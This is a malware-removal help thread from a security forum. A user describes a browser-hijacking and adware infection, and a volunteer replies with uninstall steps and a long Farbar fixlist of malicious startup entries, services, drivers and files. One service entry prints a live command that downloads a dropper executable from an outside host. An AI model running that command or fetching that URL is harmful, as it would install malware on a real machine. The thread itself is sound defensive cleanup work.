Virus/Malware Attack - Random Chrome Startup, ISE, install attempts, etc


  • This topic is locked
9 replies to this topic

#1 billiam864

billiam864

  • Members
  • 71 posts

Posted 27 December 2016 - 03:59 PM

Hi,

 

I apparently tried to download the wrong kind of software. My computer was immediately attacked. Issues noticed thus far are Chrome won't start up/load websites, but will start at random to searching.com, wizzit, or other sites. Random installations are appearing for unknown software. Internet Security essentials is popping up to block websites. I cannot use Windows Defender as it keeps turning it off, and changing the Group Policy settings. My computer is super slow, and I couldn't even get to a website to download the Farbar Tool to create data logs (used USB flash drive to transfer).

 

CPU details:

Lenovo Ultrabook (3 years old)

Windows 10

 

BleepingComputer helped me wonderfully a few years ago, so I'm coming back again!

 

Logs are attached.

 



#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,971 posts
  • Gender:Male
  • Location:California
  • Local time:07:48 PM

Posted 27 December 2016 - 08:56 PM

Greetings billiam864 and welcome to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Reply Topic button instead.
  • In the upper right hand corner of the topic you will see the Follow Topic button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far. Please allow me just a bit of time to review what you have posted.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 Oh My!

Oh My!


Posted 27 December 2016 - 10:44 PM

Greetings.

We have a bit of work to do. If you are unable to complete the below after booting normally, please boot into Safe Mode with Networking and attempt it.

===================================================

Uninstalling Programs Using Revo Uninstaller Free

--------------------

I recommend uninstalling the below listed program(s) from your computer.

Revo Uninstaller is more thorough in deleting programs on your computer than using the Add/Remove option in Windows.  Since it is a more powerful tool, please be sure to follow the instructions carefully.

Please note there is a chance when you look for this program to uninstall through Revo it might not be listed because of a previous uninstall.  If that is the case simply stop and let me know.

  • Please download and install Revo Uninstaller Free
  • Double click the Revo Uninstaller icon
  • From the list of programs double click on the listed program(s), or anything similar, to remove it (if it exists)

AnonymizerGadget
AnySend
BandwidthStat
BestCleaner version 1.0
Body Text Feathering
CleanBrowser
EZSearch
Itibiti RTC
KNCTR
MyBeeSearchService
NowUSeeIt Player
One System Care
ProxyGate version 3.0.0.1176
REOptimizer
Search module
shopperz
Social2Search
System Healer
Unfugitive Archhypocrite Asonia
Youtube AdBlock
  • If presented with the program uninstall option click Uninstall
  • If asked to reboot select Reboot later
  • Under Scanning Modes select Advanced then select Scan
  • On the Found leftover Registry items window check the items in bold only, then click Delete. You may have to expand some folders by clicking the "+" mark.
  • When prompted click on Next then Yes
  • On the Found leftover files and folders window click on Select all, click Finish, then click Yes

===================================================

Farbar's Recovery Scan Tool - Run Fix in Normal or Safe Mode

--------------------
  • Press the Windows Key + R on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it as fixlist.txt in the same location/folder as FRST.exe (<<<Important)

CreateRestorePoint:
CloseProcesses:
C:\Users\Robert G\AppData\Local\Temp\WS
C:\Users\Robert G\AppData\Roaming\src_srv
C:\Program Files\AE5AV44CD6
C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE
C:\Program Files (x86)\mem
C:\Program Files (x86)\BestCleaner
C:\Program Files\1OZOH9DOKF
C:\Program Files\0DA5GV0SMZ
C:\Program Files (x86)\Unfugitivepocson
C:\Program Files (x86)\Ovals
C:\Program Files (x86)\NowUSeeItPlayer
C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956\e06d61be9f5e5cd7184b5ecb5bf64007.exe
C:\Program Files\Common Files\Noobzo
C:\Program Files\Jidd
C:\Users\Robert G\AppData\Roaming\JucdiJhnoz
C:\Users\Robert G\AppData\Roaming\Xeeedxi
C:\Users\Robert G\AppData\Roaming\Interstatnogui
C:\Windows\Temp\nst9E9E.tmp
C:\Windows\Temp\set_xVQSGNGL.exe
C:\Windows\Temp\set_xVQSGNGL.exe
C:\Users\Robert G\AppData\Local\Temp\WS
C:\Program Files (x86)\Unfugitivepocson
HKLM\...\Run: [group] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKLM\...\Run: [groupgroup] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKLM-x32\...\Run: [AnonymizerGadget] => "C:\Users\Robert G\AppData\Roaming\AGData\bin$\AnonymizerLauncher.exe" /S /startup --ppapi-flash-path=./pepflashplayer.dll /source:1665 /subsource:200088693 <===== ATTENTION
C:\Users\Robert G\AppData\Roaming\AGData
HKLM-x32\...\Run: [src_srv] => C:\Users\Robert G\AppData\Roaming\src_srv\strttst.exe [16464 2016-12-26] ()
HKLM-x32\...\Run: [ayling] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKLM-x32\...\Run: [aylingayling] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKLM-x32\...\Run: [BestCleaner] => C:\Program Files (x86)\BestCleaner\BestCleaner.exe [180736 2016-09-16] () <===== ATTENTION
HKLM-x32\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [764144 2016-01-11] () <===== ATTENTION
HKLM\...\RunOnce: [OMEWPRODUCT_FD7I7] => C:\Program Files (x86)\BestCleaner\6URRPC.exe [411648 2016-12-27] (LFG655OZW) <===== ATTENTION
HKLM\...\RunOnce: [OMEWPRODUCT_4SCPB] => C:\Program Files (x86)\BestCleaner\RLLZNZ.exe [411648 2016-12-27] (LFG655OZW) <===== ATTENTION
HKLM\...\Policies\Explorer: [NoViewOnDrive] 0
HKLM\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKLM\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKLM\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKLM\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKLM\...\Policies\Explorer: [NoViewContextMenu] 0
HKLM\...\Policies\Explorer: [NoShellSearchButton] 0
HKLM\...\Policies\Explorer: [NoFind] 0
HKLM\...\Policies\Explorer: [NoFile] 0
HKLM\...\Policies\Explorer: [HideClock] 0
HKLM\...\Policies\Explorer: [NoTrayContextMenu] 0
HKLM\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKLM\...\Policies\Explorer: [NoSetFolders] 0
HKLM\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKLM\...\Policies\Explorer: [NoSetTaskbar] 0
HKLM\...\Policies\Explorer: [NoDeletePrinter] 0
HKLM\...\Policies\Explorer: [NoDFSTab] 0
HKLM\...\Policies\Explorer: [NoChangeStartMenu] 0
HKLM\...\Policies\Explorer: [NoLogoff] 0
HKLM\...\Policies\Explorer: [NoWindowsUpdate] 0
HKLM\...\Policies\Explorer: [NoEncryptOnMove] 0
HKLM\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKLM\...\Policies\Explorer: [NoResolveSearch] 0
HKLM\...\Policies\Explorer: [NoSaveSettings] 0
HKLM\...\Policies\Explorer: [NoHardwareTab] 0
HKLM\...\Policies\Explorer: [NoStartMenuSubFolders] 0
HKLM\...\Policies\Explorer: [NoDesktop] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [probabaly] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [probabalyprobabaly] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [formally] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [formallyformally] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [7E2GIGOFIW] => C:\Program Files\AE5AV44CD6\AE5AV44CD.exe [369152 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [kelling] => C:\Program Files (x86)\mem\kelling.exe [68835 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [const] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [ProxyGate] => C:\Users\Robert G\AppData\Roaming\ProxyGate\MainService.exe [1142880 2016-01-10] (Gold Click Ltd) <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [DP53A0YCAS] => C:\Program Files\1OZOH9DOKF\8RNAHD98E.exe [369152 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [slisdo] => rundll32.exe "C:\Users\Robert G\AppData\Local\slisdo.dll",slisdo <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [8SI36M2PFP] => C:\Program Files\0DA5GV0SMZ\0DA5GV0SM.exe [369152 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [YPCXU7XLWZ] => C:\Program Files (x86)\BestCleaner\ZES6LOELP3.exe [369152 2016-12-27] () <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [Q4M50GL1YU] => C:\Program Files (x86)\BestCleaner\A3TLSPE275.exe [369152 2016-12-27] () <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [764144 2016-01-11] () <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [Interstatnogui] => C:\Users\Robert G\AppData\Roaming\Interstatnogui\interstatnogui.exe [2757568 2016-12-27] (Global surveys) <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [DisableCMD] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoFind] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoFile] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [HideClock] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoStartMenuSubFolders] 0
Startup: C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\misprision.lnk [2016-12-27]
ShortcutTarget: misprision.lnk -> C:\Program Files (x86)\Ovals\fluctuations.exe ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www-searching.com/?pid=s&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,&vp=ch&prd=set_ie
SearchScopes: HKU\S-1-5-21-3079306625-983104223-3348847558-1001 -> DefaultScope {CD01B6C4-A7DB-43CF-B6B5-9E5E0419DA91} URL =
SearchScopes: HKU\S-1-5-21-3079306625-983104223-3348847558-1001 -> {B2155548-F7E4-4313-ACE1-89C26E550F10} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
SearchScopes: HKU\S-1-5-21-3079306625-983104223-3348847558-1001 -> {CD01B6C4-A7DB-43CF-B6B5-9E5E0419DA91} URL =
BHO: Jidd -> {9211B66D-AA1B-4BD0-bF35-65E6C6E5F23F} -> C:\Program Files\Jidd\Rorfeql64.dll [2016-12-27] ()
BHO: No Name -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [No File]
CHR HomePage: Default -> hxxp://www-searching.com/?pid=s&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,&vp=ch&prd=set_ch
CHR StartupUrls: Default -> "hxxp://www-searching.com/?pid=s&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,&vp=ch&prd=set_ch"
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shyos&prd=set_ch&q={searchTerms}&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
R2 66d2d577efd779c3e9f6f6c2faf74956; C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956\e06d61be9f5e5cd7184b5ecb5bf64007.exe [5556736 2016-12-16] () [File not signed] <==== ATTENTION
R2 Cegoe; C:\Users\Robert G\AppData\Roaming\Xeeedxi\Xeeedxi.exe [170496 2016-12-04] () [File not signed]
R2 Ilaaugca; C:\Users\Robert G\AppData\Roaming\JucdiJhnoz\Rawei.exe [121344 2016-12-04] () [File not signed]
R2 KarxMhfonki; C:\Program Files\Jidd\KarxMhfonki.exe [1684992 2016-12-27] () [File not signed]
R2 srcsrv; C:\Users\Robert G\AppData\Roaming\src_srv\winsrcsrv.exe [13904 2016-12-26] ()
R2 UnfugitiveA; C:\Program Files (x86)\Unfugitivepocson\UnfugitiveA.exe [132096 2016-12-16] (Renascence Inc.) [File not signed]
R2 WindowService; C:\Users\Robert G\AppData\Local\Temp\WS\WindowService.exe [8192 2016-12-25] () [File not signed]
S3 CHNGTSvc; c:\exervice.exe http://cloudfront.3aede491e42bccaa839f051de3c638120d682b5c.tech/download/xpack1221_US.1482324322.exe [X] <==== ATTENTION
c:\exervice.exe
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
R2 meseboje; C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE\knsg851A.tmpfs [X]
R1 979804fd5c15500d838ae68596384f64; C:\WINDOWS\system32\drivers\979804fd5c15500d838ae68596384f64.sys [95040 2016-12-16] (97V68D) <==== ATTENTION
R1 cherimoya; C:\WINDOWS\System32\drivers\cherimoya.sys [65440 2016-12-27] (Windows ® Win 7 DDK provider) <==== ATTENTION
C:\WINDOWS\system32\drivers\979804fd5c15500d838ae68596384f64.sys
C:\WINDOWS\System32\drivers\cherimoya.sys
R3 SMUpdd; C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys [52992 2016-12-26] ()
2016-12-27 13:36 - 2016-12-27 13:38 - 00000000 ____D C:\Users\Robert G\AppData\Local\E5AD75FC-1482845765-9D97-579A-C454442718AE
2016-12-27 13:36 - 2016-12-27 13:38 - 00000000 ____D C:\Program Files\Jidd
2016-12-27 13:36 - 2016-12-27 13:36 - 00439808 _____ C:\ProgramData\smp2.exe
2016-12-27 13:36 - 2016-12-27 13:36 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-12-27 13:36 - 2016-12-27 13:36 - 00004424 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134
2016-12-27 13:36 - 2016-12-27 13:36 - 00004262 _____ C:\WINDOWS\System32\Tasks\SMW_P
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____H C:\WINDOWS\system32\BITBBD7.tmp
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\JucdiJhnoz
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\LocalLow\Company
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\Local\Tempfolder
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\Local\CrashRpt
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\uninst
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\ProgramData\SearchModule
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Program Files\JiddUn
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Program Files\Common Files\Noobzo
2016-12-27 13:21 - 2016-12-27 13:21 - 00000000 ____D C:\ProgramData\d4b1e343-7d03-0
2016-12-27 13:16 - 2016-12-27 13:16 - 00003688 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-12-27 13:16 - 2016-12-27 13:16 - 00002954 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-12-27 13:16 - 2016-12-27 13:16 - 00002660 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-12-27 13:16 - 2016-12-27 13:16 - 00001063 _____ C:\Users\Public\Desktop\Launch System Healer.lnk
2016-12-27 13:16 - 2016-12-27 13:16 - 00000308 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-12-27 13:16 - 2016-12-27 13:16 - 00000308 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-12-27 13:16 - 2016-12-27 13:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2016-12-27 13:16 - 2016-12-27 13:16 - 00000000 ____D C:\ProgramData\d4b1e343-2e47-1
2016-12-27 13:16 - 2016-12-27 13:16 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2016-12-27 13:12 - 2016-12-27 13:12 - 08784866 _____ C:\xpack1221_US.1482324322.exe
2016-12-27 13:12 - 2016-12-27 13:12 - 00000000 ____D C:\Program Files (x86)\SoftUpgrade
2016-12-27 13:10 - 2016-12-27 13:11 - 08784866 _____ C:\WINDOWS\SysWOW64\SendRequest Error
2016-12-27 13:09 - 2016-12-27 13:54 - 00000000 ____D C:\WINDOWS\system32\SSL
2016-12-27 13:09 - 2016-12-27 13:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Socia2Sear Browser Enhancer
2016-12-27 13:09 - 2016-12-27 13:09 - 00000000 ____D C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956
2016-12-27 13:08 - 2016-12-27 13:08 - 00001150 _____ C:\Users\Public\Desktop\KNCTR.lnk
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Users\Robert G\AppData\Local\NowUSeeItPlayer
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Users\Robert G\AppData\Local\Chromium
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NowUSeeIt Player
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KNCTR
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\NowUSeeItPlayer
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\Itibiti Soft Phone
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\CleanBrowser
2016-12-27 13:07 - 2016-12-27 13:37 - 00000000 ____D C:\Users\Robert G\AppData\Local\E5AD75FC-1482844048-9D97-579A-C454442718AE
2016-12-27 13:07 - 2016-12-27 13:10 - 00100352 _____ C:\Users\Robert G\AppData\Local\slisdo.dll
2016-12-27 13:07 - 2016-12-27 13:10 - 00002560 _____ C:\Users\Robert G\AppData\Local\uninstallro.exe
2016-12-27 13:07 - 2016-12-27 13:07 - 00003074 _____ C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock2
2016-12-27 13:07 - 2016-12-27 13:07 - 00000366 _____ C:\WINDOWS\Tasks\Update Service for Youtube AdBlock2.job
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____H C:\WINDOWS\system32\BITDFC5.tmp
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\ProxyGate
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AnonymizerGadget
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Program Files\1OZOH9DOKF
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Program Files\0DA5GV0SMZ
2016-12-27 13:06 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\BestCleaner
2016-12-27 13:06 - 2016-12-27 13:06 - 00002770 _____ C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock
2016-12-27 13:06 - 2016-12-27 13:06 - 00000366 _____ C:\WINDOWS\Tasks\Update Service for Youtube AdBlock.job
2016-12-27 13:06 - 2016-12-27 13:06 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-12-27 13:06 - 2016-12-27 13:06 - 00000000 ____D C:\Program Files (x86)\Youtube AdBlock
2016-12-27 13:05 - 2016-12-27 13:06 - 02194294 _____ (Stellar Information Technology Pvt Ltd. ) C:\Users\Robert G\Downloads\Unconfirmed 89628.crdownload
2016-12-27 13:05 - 2016-12-27 13:06 - 00003874 _____ C:\WINDOWS\System32\Tasks\73699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003866 _____ C:\WINDOWS\System32\Tasks\k73699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003860 _____ C:\WINDOWS\System32\Tasks\18170115
2016-12-27 13:05 - 2016-12-27 13:06 - 00003856 _____ C:\WINDOWS\System32\Tasks\60353394
2016-12-27 13:05 - 2016-12-27 13:06 - 00003746 _____ C:\WINDOWS\System32\Tasks\ga7369985773699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003742 _____ C:\WINDOWS\System32\Tasks\gak73699857k73699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003734 _____ C:\WINDOWS\System32\Tasks\ga1817011518170115
2016-12-27 13:05 - 2016-12-27 13:06 - 00003728 _____ C:\WINDOWS\System32\Tasks\ga6035339460353394
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ___HD C:\Program Files (x86)\Ovals
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ___HD C:\Program Files (x86)\mem
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ___HD C:\Program Files (x86)\Disenfranchise
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\ASPackage
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Program Files\AE5AV44CD6
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Program Files (x86)\knockdowns
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE
2016-12-27 13:03 - 2016-12-27 13:07 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\AGData
2016-12-27 13:03 - 2016-12-27 13:03 - 00003804 _____ C:\WINDOWS\System32\Tasks\src_srv
2016-12-27 13:03 - 2016-12-27 13:03 - 00003414 _____ C:\WINDOWS\System32\Tasks\AGProxyCheck
2016-12-27 13:03 - 2016-12-27 13:03 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\src_srv
2016-12-27 13:03 - 2016-12-27 13:03 - 00000000 ____D C:\Program Files (x86)\AnonymizerGadget
2016-12-27 13:02 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\Unfugitivepocson
2016-12-27 13:02 - 2016-12-27 13:02 - 00024776 _____ C:\WINDOWS\System32\Tasks\{7D0C7D47-7A0E-7E79-0A11-087E790A110B}
2016-12-27 13:02 - 2016-12-27 13:02 - 00003692 _____ C:\WINDOWS\System32\Tasks\One System Care Task
2016-12-27 13:02 - 2016-12-27 13:02 - 00003372 _____ C:\WINDOWS\System32\Tasks\One System Care Monitor
2016-12-27 13:02 - 2016-12-27 13:02 - 00001147 _____ C:\Users\Public\Desktop\Launch One System Care.lnk
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\One System Care
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\ProgramData\1a467d37-72a5-1
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\ProgramData\1a467d37-42f7-0
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-12-27 12:51 - 2016-12-27 12:51 - 00010752 _____ C:\Users\Robert G\AppData\Local\fluctuations.exe
2016-12-21 06:43 - 2016-12-21 06:43 - 00046592 _____ C:\exervice.exe
2016-12-16 09:24 - 2016-12-16 09:24 - 01718968 _____ C:\WINDOWS\4b15ad0c9aba0f5f34b9d34c5ca543e0.exe
2016-12-16 09:18 - 2016-12-16 09:18 - 00095040 _____ (97V68D) C:\WINDOWS\system32\Drivers\979804fd5c15500d838ae68596384f64.sys
2014-12-01 12:43 - 2014-12-01 12:43 - 0000230 _____ () C:\Users\Robert G\AppData\Local\328ac946-536c-4e44-8483-c0f65d99bbad.dat
